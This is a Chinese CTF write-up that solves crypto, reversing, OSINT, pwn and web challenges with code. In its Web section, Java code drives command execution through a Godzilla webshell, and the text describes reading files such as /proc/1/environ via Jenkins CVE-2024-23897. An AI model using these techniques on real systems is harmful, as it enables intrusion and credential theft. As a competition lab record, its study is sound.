# Misc
### 一个参赛的故事（1）
#### 解题思路
从图`1-1.jpg`中可知列车号为**D2873**，查询车次信息可以得到经停站点。
图`1-2.jpg`左侧暴露出的车站凭印象疑似为南京南站，查找图片后证实，且列车的确经停南京南站，至此基本确认。
### 一个参赛的故事（2）
#### 解题思路
`2-3.jpg`中可见“大学城北站”字样，地图搜索存在合肥、广州、北京等多个结果。之后查找图`2-2.jpg`、`2-3.jpg`中出现的大量招牌名称，最终查找到图`2-2.jpg`中的名称“吃巷”仅存在合肥一处，且经过街景辨认此处以及合肥的大学城北站均与照片符合。
由地图可知大学城北站附近的高校主要有合肥工业大学（翡翠湖校区）、安徽医科大学（南校区）等。通过网络搜索相关高校在2023年端午假期附近举办的赛事，尝试提交。
### 被监控的鼠标
#### 解题思路
文件开头给出了数据来源：**Bus Hound**，网络搜索可以得到其抓取鼠标数据的格式信息。通过解析数据还原鼠标操作，绘制运动过程，可以观察得到flag
#### 走过的弯路
初期找到的格式信息解释较为简略，没有说明坐标数据具体类型（是否为有符号数），代码编写过程中也没有意识到这个问题，不小心将其默认作为无符号数，导致鼠标坐标不断增大，得不到正确图像。
没有考虑鼠标按键状态，绘制的图案难以辨认。后修改为仅绘制左键按下期间的路径。
屏幕坐标原点在左上角，忽略这一点导致绘制出来的图案是反的
#### 解题代码
```python
import numpy as np
import struct
import matplotlib.pyplot as plt

with open("data.txt", "r") as f:
    raw = f.readlines()

data = [
    bytes.fromhex(" ".join(raw[i + offset][15:39] for offset in range(3)))
    for i in range(13, len(raw), 3)
]

pos = [0, 0]
xs = []
ys = []
lbd = False
for line in data:
    (pos_type, btn_flag, wheel, x, y) = struct.unpack("<xxHHHxxxxiixxxx", line)
    if btn_flag == 1:
        lbd = True
    elif btn_flag == 2:
        lbd = False
        
    if x != 0 or y != 0:
        if pos_type == 0:
            pos[0] += x
            pos[1] += y
        elif pos_type == 1:
            pos = [x, y]
        else:
            raise Exception(pos_type)
        if lbd:
            xs.append(pos[0])
            ys.append(-pos[1])

plt.scatter(xs, ys)
plt.show()
```

# Crypto

### 鸡鸣寺的樱花开了
#### 解题思路
RSA解密。
读取公钥，获得$n$、$e$，强行将$n$分解得到$p$、$q$，即可解出$d$进行解密
#### 走过的弯路
一开始使用的在线分解器数个小时没有结果，后花大量实现寻找其它解法，差点就弃掉这题
后来换了一个网页只花了一分钟左右......
#### 解题代码
```python
c = 59236096151487208758165593350084913489019974303922002230626183148437025385895
n = 86898006501296536537757441999055474808944802637452293129922543365662074850821
p = 262181341412271658950704507835125171347
q = 331442375087448495100547204276944820743

phi = (p - 1) * (q - 1)
e = 65537

def extended_gcd(a, b):
    if b == 0:
        return (a, 1, 0)
    else:
        g, x, y = extended_gcd(b, a % b)
        return (g, y, x - (a // b) * y)

def mod_inverse():
    g, x, y = extended_gcd(e, phi)
    if g != 1:
        raise ValueError("Modular inverse does not exist")
    else:
        return x % phi

m = pow(c,mod_inverse(),n)
print(m.to_bytes((m.bit_length() + 7) // 8, 'big').decode())
```

### 难忘的自研系统！
#### 解题思路
根据题目提示确定是DES加密，且给出了16组子密钥。网上搜索学习后得知：已知前两组子密钥就可以反推原密钥的大多数位，在b站学习子密钥产生过程，写出反推程序，利用已有代码框架，解密即可
#### 走过的弯路
- 找了很多DES解密的代码，均不能用且看不懂
- 反推后应当有8位仍然是未知，本以为需要枚举构造$2^{8}$种不同的密钥，只有一组可以解密出正确的内容，然而事实上每一组解密出的都是相同的
#### 解题代码
```python
# 暴露部分内容方便使用
class des(_baseDes):
	...
	pc1 = __pc1
	pc2 = __pc2
	
	@classmethod
	def __BitList_to_String(data):
		...
	...
	
def reverse(k, key):
    kkey = p2r(key + ['*'] * 8)
    c = kkey[:28]
    d = kkey[28:]
    for i in range(k):
        c = right(c)
        d = right(d)
    t = c + d + ['*'] * 8
    t = p1r(t)
    print(t)
    return t

def merge(l1, l2):
    if len(l1) != len(l2):
        print("wrong len!")
    ans = []
    for i in range(len(l1)):
        if (l1[i] != '*'):
            if (l2[i] != '*'):
                if (l1[i] == l2[i]):
                    ans.append(l1[i])
                else:
                    print('wrong merge')
            else:
                ans.append(l1[i])
        else:
            if (l2[i] == '*'):
                ans.append('*')
            else:
                ans.append(l2[i])
    return ans


if __name__ == '__main__':
	from sympy.combinatorics import Permutation
	import itertools as it
	import base64

    Key1 = [...]
    Key2 = [...]
    
    p1 = Permutation(des.pc1 + [i for i in range(7, 64, 8)])
    t = [i for i in range(56) if i not in des.pc2]
    p2 = Permutation(des.pc2 + t)

    left = Permutation([(i + 1) % 28 for i in range(28)])
    right = left ** (-1)

    p2r = p2 ** (-1)
    p1r = p1 ** (-1)

    k1 = reverse(1, Key1)
    k2 = reverse(2, Key2)
    kk = merge(k1, k2)    

    s = list(it.product(range(2), repeat=8))
    s = [list(i) for i in s]

    keys = []
    for i in s:
        t = kk[:]
        for j in range(8):
            t[j * 8 + 7] = i[j]
        keys.append(t)

    c = base64.b64decode('aINtLuuRFvAhWiOTVSLkOp7mGG4PxvY3GmklkSzpnBduh2jL7hkwyA==')
    for key in keys:
        di = des(des._des__BitList_to_String(key), mode=0, pad=' ', padmode=PAD_NORMAL)
        print(di.decrypt(c))
```

### 更加高级的系统！
#### 解题思路
AES加密，key和iv都已知，直接解密即可
#### 走过的弯路
题目给的代码中的pad只能补齐到16位，而不是“16的倍数”位，没细看导致踩坑
#### 解题代码
```python
import base64
from Crypto.Cipher import AES

iv = '1234567890123456'
key = 'chiveneed crypto'

AES_obj = AES.new(key.encode(), AES.MODE_CBC, iv.encode())
data = "1HNbfgdgCb//dpGk12YtczYGLYmjdR7s9dCKJJfrr98="
data = base64.b64decode(data)
while len(data) % 16 != 0:
    data = data + b' '
print(AES_obj.decrypt(s2).decode())
```

### 遥遥领先！
#### 解题思路
代码给出了加密过程，为了解密需要获得私钥$d$。
代码中没有给出计算$d$所需的$\varphi(n)$，但观察大素数$p$、$q$的构造过程可以发现以下关系：
$$
\begin{aligned}
p &= o_1r_1 + 1 \\
q &= o_2r_2 + 1 \\
order &= o_1o_2 \\
\\
n &= pq \\
&= (o_1r_1 + 1) * (o_1r_1 + 1) \\
&= order * r_1r_2 + o_1r_1 + o_2r_2 + 1 \\ 
\\
\varphi(n) &= (p - 1) * (q - 1) \\
&= order * r_1r_2
\end{aligned}
$$
同时，从代码中可以看出$o_1,o_2\gg r_1,r_2$（300位对200+位），所以可以通过整除后乘回的方式从$n$中提取出$\varphi(n)$：
$$
\begin{aligned}
&(n // order) * order \\
=& ((order * r_1r_2 + (o_1r_1 + o_2r_2 + 1)) // order) * order \\
=& (r_1r_2 + 0) * order \\
=& order * r_1r_2 \\
=& \varphi(n)
\end{aligned}
$$
得到$\varphi(n)$后即可使用常规方法计算$d$，进而实现解密
### 解题代码
```python
e = 0x10001
n = ...
c = ...
a = ...
order = ...

def extended_gcd(a, b):
    if b == 0:
        return (a, 1, 0)
    else:
        g, x, y = extended_gcd(b, a % b)
        return (g, y, x - (a // b) * y)

def mod_inverse(e, phi):
    g, x, y = extended_gcd(e, phi)
    if g != 1:
        raise ValueError("Modular inverse does not exist")
    else:
        return x % phi

phi = (n // order) * order

d = mod_inverse(e, phi)

m = pow(c, d, n)

print(m.to_bytes((m.bit_length()+7)//8, 'big').decode())
```

### Linear Algebra
#### 解题思路
根据题目得知是ecdsa+AES，尝试了解相关内容，但是学习过后对ecdsa的计算过程还是不理解，也没有解题方法
网上找到[NeSE Team](https://nese.team/posts/n1ctf2023/)，虽然看不太懂，但是其中算法的输入输出与本题高度相似（s、r、cipher甚至msg=“welcome to xxxx”），在此代码基础进行尝试
#### 走过的弯路
- 临时学习ecdsa完全无法理解，网上有关ecdsa解密甚至加密的内容都很少，没什么头绪
- 找到前面提到的网站后，本以为其中给出的代码是普通的python程序，但始终没有找到变量ZZ和函数matrix从何而来，找了一大堆python库都没有，最后才发现是sagemath程序
#### 解题代码
```python
from hashlib import sha256
import ecdsa
from Crypto.Util.number import *
from Crypto.Cipher import AES
import base64

def hhecdsa_to_lattice(msg, sig, recentering = True):
    h = int(sha256(msg).hexdigest(),16)
    hmsb = h >> 128
    curve = ecdsa.NIST256p.generator
    n = curve.order()
    r,s = sig
    A = (2**128 - s * int(inverse_mod(r,n))) % n
    b = (h - 2**128 * s * hmsb) * int(inverse_mod(r,n)) % n
    L = 2**128
    if recentering:
        b = (b + (A + 1) * 2**127) % n
        L = 2**127
    M = [
        [n, 0, 0],
        [A, 1, 0],
        [b, 0, L]
    ]
    return matrix(ZZ, M)

def parse_possible_solutions(L):
    sols = []
    for row in L:
        if row[-1] == 2**127:
            # print("case 1")
            dlsb =  int(-row[0] + 2**127)
            dmsb =  int(row[1] + 2**127)
            d = (dmsb << 128) + dlsb
            sols.append(d)
        elif row[-1] == -2**127:
            # print("case 2")
            dlsb =  int(2**127 - row[0])
            dmsb =  int(2**127 - row[1])
            d = (dmsb << 128) + dlsb
            sols.append(d)
    return sols

s = 105099045884107140251866293520099947215548172791544959305301235403391850841098
r = 41483115476636008411251585399556694767499313153329186532426909775601995121198
cipher = base64.b64decode(b"CSgEe88Tfh0LTzNpg7YIU2fLX5LnXIwLt9rMetNxWctjWFC2fPesBYneUPv4w/Qg")
msg = b'welcome to chive2024!'

sig = (r,s)
M = hhecdsa_to_lattice(msg, sig, True)
L = M.BKZ(block_size = 25)
ds = parse_possible_solutions(L)

d = ds[0]
aes = AES.new(long_to_bytes(int(d)), mode=AES.MODE_ECB)
pt = aes.decrypt(cipher)
print(f'pt = {pt}')
```

# Pwn
### 36points1
#### 解题思路
使用`nc`命令连接服务器，可以看出是简单的轮盘游戏。
共有37种选择（0~36），压中返还72倍，且每次可压多个数字，那么只需要每次将37个数字全部压上相同金额，则必中且可以获利。
程序实现上述过程，攒够钱数购买flag即可
#### 走过的弯路
从编程运行过程中发现了很多奇怪的现象，包括明明压中了却仍不给钱、下注后不会实际扣除余额等，同时好奇商店中其它物品的作用。尝试压注后前往商店购买**lucky charm**，再进行转盘，结果符合预期。
#### 解题代码
```python
import socket
import time

client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(('chive.vaa.la', 31995))

def recive():
    res = ''
    while data := client.recv(4096):
        data = data.decode()
        print(data)
        res += data
        if res.strip().endswith('>>>'):
            print(res, end=' ')
            return

def send(msg=None):
    if msg is None:
        msg = input()
    print(msg)
    client.send(f'{msg}'.strip().encode())


recive()
while True:
    for i in range(0, 37, 1):
        # 对37个数字分别下注
        send(1)
        recive()
        send(i)
        recive()
        send(100)
        recive()
    # 购买lucky charm
    send(5)
    recive()
    send(1)
    recive()
    send(2)
    recive()
    send(3)
    recive()
    # 转动轮盘并查看当前金额
    send(4)
    recive()
    send(2)
    recive()
    if input('continue? ') != 'y':
        break
while True:
    # 结尾部分手动操作
    send()
    recive()
```

# Web
### Hacker ouT!
#### 解题思路
观察页面源码发现对输入为**admin**的情况进行了拦截，于是绕过前端逻辑，手动向/set_cookie发送包含`inputText=admin`的POST请求，遂得到flag
### 冷冽谷的哥斯拉
#### 解题思路
通过后台扫描工具发现存在/shell.jsp。直接访问可以得到此jsp页面源码。
阅读源码可以看出其在try-catch块中尝试读取键为`Noz0m1`的query parameter，经过Base64解码、AES解密后作为java类的字节码储存在session的payload里，并在下次请求该页面时将其实例化，进而围绕其进行一些操作（调用了equals、toString），在最后向返回页面输出包含arrOut在内的内容。
也就是说，只要能够构建出合适的java类，获取其字节码，仿照jsp文件中的解码流程进行编码，作为参数上传使得try内的代码能够完整执行，就可以通过在`f.equals(arrOut)`时获取数据并向arrOut写入，从而来得到任意想要的内容
#### 走过的弯路
每次修改类的内容重新上传字节码参数时需要将cookie清空，并连续提交两次，才能在服务端生成新的session，将新提交的字节码储存起来并读取、实例化、运行。
#### 解题代码
```java
// App.java
package com.godzilla;

import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.net.URLEncoder;
import java.util.Base64;
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;

public class App {
    public static void main(String[] args) throws Exception {
	    // 前半截实现对MyClass字节码编码，用于上传
        byte[] rawByte = getBytecode(MyClass.class);
        byte[] AESByte = AES(rawByte, Cipher.ENCRYPT_MODE);
        String b64String = Base64.getEncoder().encodeToString(AESByte);
        System.out.println(URLEncoder.encode(b64String, "UTF-8"));
        
		// 后半截实现对返回内容解码
        String result = "<output>";
        result = result.substring(16, result.length()-16);
        System.out.println(new String(AES(Base64.getDecoder().decode(result), Cipher.DECRYPT_MODE)));
    }

    private static byte[] getBytecode(Class<?> clazz) throws IOException {
        String classFilePath = "/" + clazz.getName().replace('.', '/') + ".class";
        InputStream inputStream = App.class.getResourceAsStream(classFilePath);
        ByteArrayOutputStream outputStream = new ByteArrayOutputStream();
        byte[] buffer = new byte[4096];
        int bytesRead;
        while ((bytesRead = inputStream.read(buffer)) != -1) {
            outputStream.write(buffer, 0, bytesRead);
        }
        return outputStream.toByteArray();
    }

    private static byte[] AES(byte[] bytes, int mode) {
        try {
            Cipher c = Cipher.getInstance("AES");
            c.init(mode, new SecretKeySpec("ffe3f468070ae0da".getBytes(), "AES"));
            return c.doFinal(bytes);
        } catch (Exception e) {
            e.printStackTrace();
            return null;
        }
    }
}
```

```java
// MyClass.java
package com.godzilla;

public class MyClass {
    public boolean equals(Object obj) {
        if (obj instanceof java.io.ByteArrayOutputStream) {
            java.io.ByteArrayOutputStream stream = (java.io.ByteArrayOutputStream) obj;
            try {
                java.io.InputStream is = java.lang.Runtime.getRuntime().exec("cat /flag").getInputStream();
                byte[] b = new byte[2048];
                while (is.read(b) != -1) {
                    stream.write(b);
                }
            } catch (Exception e) {
            }
        }
        return true;
    }

    public String toString() {
        return "";
    }
}

```
### jenkinslove
#### 解题思路
根据提示（"CVE"）查找当前jenkins版本（2.441）存在的漏洞，发现存在漏洞CVE-2024-23897，可以由此获取系统中任意文件内容。进一步搜索发现已有相关工具（[GitHub - xaitax/CVE-2024-23897: CVE-2024-23897 | Jenkins <= 2.441 & <= LTS 2.426.2 PoC and scanner.](https://github.com/xaitax/CVE-2024-23897)）。使用工具查找并读取flag文件即可
#### 走过的弯路
借助工具可以读取文件但无法查看路径，考虑到其它题目将flag存放在`/flag`，尝试读取后得到信息"**maybe environ?**"。但读取`/proc/self/environ`时观察到`GZCTF_FLAG=no_FLAG`，一度认为此题无解（未设置flag？）。最后尝试读取`/proc/1/environ`，意外发现flag
# Reverse
### HIT! -1
#### 解题思路
使用十六进制编辑器查看可执行文件，可见明文储存的flag
### HIT! -2
#### 解题思路
反编译可执行文件，可以看到程序的身份验证逻辑。由此逆推期望的输入即为flag。
具体验证流程为将输入的Register Code存入32个字节长度的字符串，对其进行一个$regcode\_x[i]=233*regcode[i]+bias[i]$的映射，之后结合一个64字符的字典进一步变换为44字节长度的字符串，与一个固定字符串相比较。
#### 走过的弯路
反编译没有识别出上述$bias$数组，在程序中显示为`&unk_4060`，很长一段时间毫无头绪。无意中发现`&unk_4060`处起恰有32字节意义不明的空白，尝试将此段内容读取作为$bias$，果然正确
#### 解题代码

```python
import numpy as np

with open('HIT.attachment', 'rb') as f:
    f.seek(0x2050)
    target = f.read(44)
    f.seek(0x2080)
    m = f.read(64)
    f.seek(0x3060)
    bias = np.frombuffer(f.read(32), np.byte)


def convert(regcode_x):
	# 对照反编译结果简化整理得到的变换逻辑
	
    v15 = 0
    s = []
    for i in range(0, 32, 3):
        
        s.append(m[regcode_x[i] >> 2])  # 可逆推regcode_x[i]的高6位   

        s.append(m[regcode_x[i + 1] >> 4 + ((regcode_x[i] & 0x3) << 4)]) # 可逆推regcode_x[i]的低2位，regcode_x[i+1]的高4位   

        s.append(m[(regcode_x[i + 1] & 0xF) << 2 + regcode_x[i + 2] >> 6]) # 可逆推regcode_x[i+1]的低4位，regcode_x[i+2]的高2位

        s.append(46 if i + 2 >= 32 else m[regcode_x[i + 2] & 0x3F]) # 可逆推regcode_[i+2]的低6位

        v15 += 4

    return s


def re_convert():
	# 根据convert()中得到的结论逆推regcode_x

    regcode_x = []

    for i in range(11):
        re_0 = m.index(target[4 * i])
        re_1 = m.index(target[4 * i + 1])
        re_2 = m.index(target[4 * i + 2])
        if not i == 10:
            re_3 = m.index(target[4 * i + 3])

        regcode_x.append(((re_0 << 2) & 0xFF) + (re_1 >> 4))
        regcode_x.append(((re_1 << 4) & 0xFF) + (re_2 >> 2))
        if not i == 10:
            regcode_x.append(((re_2 << 6) & 0xFF) + re_3)

    return regcode_x


regcode_x = np.array(re_convert(), np.byte)
ax = regcode_x - bias

a = np.array(233, np.byte)
x = []

# 线性变换过程存在数据溢出，无法直接除出结果，使用枚举判断regcode[i]取何值时可以得到regcode_x = 233 * regcode[i] + bias[i]
for a_x in ax:
    for i in range(256):
        if np.array(i, dtype=np.byte) * a == a_x:
            x.append(i)

print(''.join(chr(c) for c in x))
```

### How Time Fly!
#### 解题思路

反编译可执行文件，可以看到程序内容为利用代数余子式递归计算64个18阶行列式，并根据行列式的值计算取值的偏移量，拼凑出flag。自行实现上述流程，使用更高效的方法计算行列式，即可得到输出
#### 走过的弯路

在反编译结果上直接修改得到的C语言版本无论如何得不到正确结果，一度怀疑是对原程序反编译结果的理解有误。后改为python实现，一次成功（%\*@^&%#!）
#### 解题代码
```python
import numpy as np

data = np.fromfile('input.bin', dtype=np.int32)
size = data[0]
for i in range(64):
    offset = 1 + i * 650
    determinant = np.frombuffer(data[offset : offset + 648], dtype=np.int64).reshape(18, 18)

    print(
        chr(np.frombuffer(data[offset + 648 : offset + 650], dtype=np.int64)[0]
        - round(np.linalg.det(determinant)) + i), end=''
    )
```

# PPC
### Introduction
#### 解题思路
略
### Git!
#### 解题思路
vscode自带git界面秒了
### 构建一个项目
#### 解题思路
main函数在`logisim.c`，添加头文件查找路径即可
#### 解题代码
```cmake
cmake_minimum_required(VERSION 3.2)  
  
project(a)  
  
add_executable(a logisim.c)  
  
target_include_directories(a PUBLIC ${CMAKE_CURRENT_SOURCE_DIR})
```
### 在世界诞生之前
#### 解题思路
linux环境运行就完了